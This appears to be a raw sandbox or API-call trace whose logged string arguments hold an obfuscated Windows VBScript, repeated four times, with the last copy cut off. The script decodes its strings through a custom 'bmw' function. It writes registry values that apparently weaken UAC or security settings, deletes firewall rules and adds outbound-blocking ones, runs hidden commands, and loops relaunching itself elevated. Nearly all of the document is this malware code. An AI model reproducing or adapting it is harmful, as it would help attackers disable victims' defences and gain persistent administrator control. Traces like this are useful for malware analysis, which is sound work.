bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0222.988] wcsncmp (_String1="\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44 [0222.988] wcsncmp (_String1="\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.988] wcsncmp (_String1="Set policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0222.988] wcsncmp (_String1="et policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 